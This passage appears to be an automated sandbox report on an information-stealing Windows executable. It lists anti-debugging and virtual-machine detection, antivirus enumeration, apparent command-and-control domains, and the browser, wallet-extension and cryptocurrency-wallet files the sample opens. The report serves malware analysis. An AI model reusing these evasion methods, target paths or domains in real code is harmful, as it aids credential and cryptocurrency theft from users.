                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5913D1 second address: 5913E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0FE0B8ED36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F0FE0B8ED38h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5913E5 second address: 5913EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5947DE second address: 5947E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5947E4 second address: 5947EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5947EF second address: 5947F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 597354 second address: 597361 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0FE14B0506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 597361 second address: 59737A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F0FE0B8ED36h 0x00000013 jl 00007F0FE0B8ED36h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 59708F second address: 597093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 597093 second address: 59709F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 59709F second address: 5970A5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 599710 second address: 59972C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0FE0B8ED3Dh 0x00000009 jmp 00007F0FE0B8ED3Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 59972C second address: 599730 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5A76EA second address: 5A76FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED3Fh 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5A8EE2 second address: 5A8EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5A8EE6 second address: 5A8EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5B5EBF second address: 5B5ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5CAFEC second address: 5CAFF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5CAFF2 second address: 5CB025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F0FE14B050Fh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007F0FE14B0513h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5390DD6 second address: 5390DE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0FE14B050Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5390E15 second address: 5390E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 pushfd 0x00000007 jmp 00007F0FE0B8ED43h 0x0000000c or ch, 0000005Eh 0x0000000f jmp 00007F0FE0B8ED49h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test al, al 0x0000001a jmp 00007F0FE0B8ED3Eh 0x0000001f je 00007F105128285Ch 0x00000025 pushad 0x00000026 mov cx, E5EDh 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F0FE0B8ED48h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5390E84 second address: 5390EAE instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 cmp dword ptr [ebp+08h], 00002000h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop esi 0x00000014 jmp 00007F0FE14B0515h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 53A09DC second address: 53A09E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 53A09E2 second address: 53A09E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 53A09E6 second address: 53A0AC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov edx, 4B85C94Ch 0x0000000f call 00007F0FE0B8ED45h 0x00000014 pushfd 0x00000015 jmp 00007F0FE0B8ED40h 0x0000001a xor ecx, 1CDB2898h 0x00000020 jmp 00007F0FE0B8ED3Bh 0x00000025 popfd 0x00000026 pop esi 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b mov ax, bx 0x0000002e pushfd 0x0000002f jmp 00007F0FE0B8ED41h 0x00000034 adc si, CE36h 0x00000039 jmp 00007F0FE0B8ED41h 0x0000003e popfd 0x0000003f popad 0x00000040 xchg eax, esi 0x00000041 jmp 00007F0FE0B8ED3Eh 0x00000046 push eax 0x00000047 jmp 00007F0FE0B8ED3Bh 0x0000004c xchg eax, esi 0x0000004d pushad 0x0000004e pushad 0x0000004f pushfd 0x00000050 jmp 00007F0FE0B8ED42h 0x00000055 jmp 00007F0FE0B8ED45h 0x0000005a popfd 0x0000005b mov bh, al 0x0000005d popad 0x0000005e mov bx, C300h 0x00000062 popad 0x00000063 mov esi, dword ptr [ebp+0Ch] 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F0FE0B8ED42h 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 53A0AC5 second address: 53A0ADF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B050Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c mov al, 49h 0x0000000e push eax 0x0000000f push edx 0x00000010 mov bx, D542h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 53A0B7A second address: 53A0BF0 instructions: 0x00000000 rdtsc 0x00000002 mov edx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F0FE0B8ED44h 0x0000000c add si, C058h 0x00000011 jmp 00007F0FE0B8ED3Bh 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, esi 0x00000019 pushad 0x0000001a mov esi, 33F9FF2Bh 0x0000001f pushad 0x00000020 call 00007F0FE0B8ED3Eh 0x00000025 pop esi 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 jmp 00007F0FE0B8ED47h 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0FE0B8ED45h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 53A0C26 second address: 53A0C6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0FE14B0517h 0x00000008 movzx esi, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f jmp 00007F0FE14B050Bh 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0FE14B0515h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Special instruction interceptor: First address: 348D95 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Special instruction interceptor: First address: 348ECE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Special instruction interceptor: First address: 50E70D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Special instruction interceptor: First address: 56A78F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Window / User API: threadDelayed 1606
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Window / User API: threadDelayed 1570
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Window / User API: threadDelayed 1112
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Window / User API: threadDelayed 1114
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5644 Thread sleep count: 1606 > 30
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5644 Thread sleep time: -3213606s >= -30000s
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5052 Thread sleep count: 1570 > 30
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5052 Thread sleep time: -3141570s >= -30000s
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 380 Thread sleep count: 1112 > 30
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 380 Thread sleep time: -2225112s >= -30000s
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5844 Thread sleep count: 1114 > 30
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5844 Thread sleep time: -2229114s >= -30000s
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 828 Thread sleep time: -120000s >= -30000s
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 6948 Thread sleep count: 68 > 30
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 6948 Thread sleep time: -136068s >= -30000s
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5052 Thread sleep time: -48024s >= -30000s
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5644 Thread sleep count: 39 > 30
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5644 Thread sleep time: -78039s >= -30000s
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: 6GNqkkKY0j.exe, 00000000.00000002.3078017104.00000000004C6000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696049293.0000000005D54000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 6GNqkkKY0j.exe, 6GNqkkKY0j.exe, 00000000.00000003.2397441650.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3023883651.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3002739984.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3020004985.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075064425.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3024388435.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397503538.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397268790.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2695354440.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042577318.00000000013E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696049293.0000000005D54000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 6GNqkkKY0j.exe, 00000000.00000002.3078017104.00000000004C6000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: NTICE
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: SICE
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: bashfulacid.lat
                Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: tentabatte.lat
                Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: curverpluch.lat
                Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: talkynicer.lat
                Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: shapestickyr.lat
                Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: manyrestro.lat
                Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: slipperyloo.lat
                Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: wordyfindy.lat
                Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: observerfry.lat
                Source: 6GNqkkKY0j.exe, 00000000.00000002.3078363659.000000000050D000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: S-:Program Manager
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3042608843.0000000001435000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3080379491.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3081447862.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075561492.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075431589.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075064425.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042472090.000000000142A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: Process Memory Space: 6GNqkkKY0j.exe PID: 3500, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: 6GNqkkKY0j.exe String found in binary or memory: %appdata%\Electrum\wallets
                Source: 6GNqkkKY0j.exe String found in binary or memory: %appdata%\ElectronCash\wallets
                Source: 6GNqkkKY0j.exe String found in binary or memory: Wallets/JAXX New Version
                Source: 6GNqkkKY0j.exe String found in binary or memory: window-state.json
                Source: 6GNqkkKY0j.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: 6GNqkkKY0j.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: 6GNqkkKY0j.exe String found in binary or memory: Wallets/Ethereum
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3002739984.00000000013E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3075588998.00000000013DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
